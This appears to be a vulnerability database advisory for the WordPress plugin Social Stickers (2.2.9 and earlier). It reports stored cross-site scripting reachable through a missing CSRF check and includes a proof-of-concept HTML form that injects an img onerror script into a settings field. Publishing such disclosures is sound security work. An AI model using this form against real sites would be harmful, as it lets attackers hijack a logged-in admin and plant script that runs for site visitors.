WordPress Plugin Vulnerabilities
Social Stickers <= 2.2.9 - Stored Cross-Site Scripting via CSRF
Description
The plugin does not have CSRF checks in place when updating its Social Network settings, and does not escape some of these fields, which could allow attackers to make a logged-in admin change them and lead to Stored Cross-Site Scripting issues.
Proof of Concept
<html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/wordpress/wp-admin/options-general.php?page=social- stickers%2Fsocial-stickers.php&tab=social_networks" method="POST"> <input type="hidden" name="aim" value="" /> <input type="hidden" name="behance" value="hello "><img src=x onerror=alert(9 )>" /> <input type="hidden" name="bebo" value="" /> <input type="hidden" name="blogger" value="" /> <input type="hidden" name="delicious" value="" /> <input type="hidden" name="designfloat" value="" /> <input type="hidden" name="deviantart" value="" /> <input type="hidden" name="digg" value="" /> <input type="hidden" name="email" value="" /> <input type="hidden" name="flickr" value="" /> <input type="hidden" name="facebook" value="" /> <input type="hidden" name="googleplus" value="" /> <input type="hidden" name="lastfm" value="" /> <input type="hidden" name="linkedin" value="" /> <input type="hidden" name="myspace" value="" /> <input type="hidden" name="newsvine" value="" /> <input type="hidden" name="picasa" value="" /> <input type="hidden" name="posterous" value="" /> <input type="hidden" name="rss" value="" /> <input type="hidden" name="qik" value="" /> <input type="hidden" name="slashdot" value="" /> <input type="hidden" name="skype" value="" /> <input type="hidden" name="stumbleupon" value="" /> <input type="hidden" name="tumblr" value="" /> <input type="hidden" name="twitter" value="" /> <input type="hidden" name="vimeo" value="" /> <input type="hidden" name="youtube" value="" /> <input type="hidden" name="wordpress" value="" /> <input type="hidden" name="Submit" value="Update usernames" /> <input type="hidden" name="social-stickers-settings-submit" value="Y" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Vinay Varma Mudunuri, Krishna Harsha Kondaveeti
Submitter
Vinay Varma Mudunuri
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-04-20 (about 2 years ago)
Added
2022-04-20 (about 2 years ago)
Last Updated
2022-04-21 (about 2 years ago)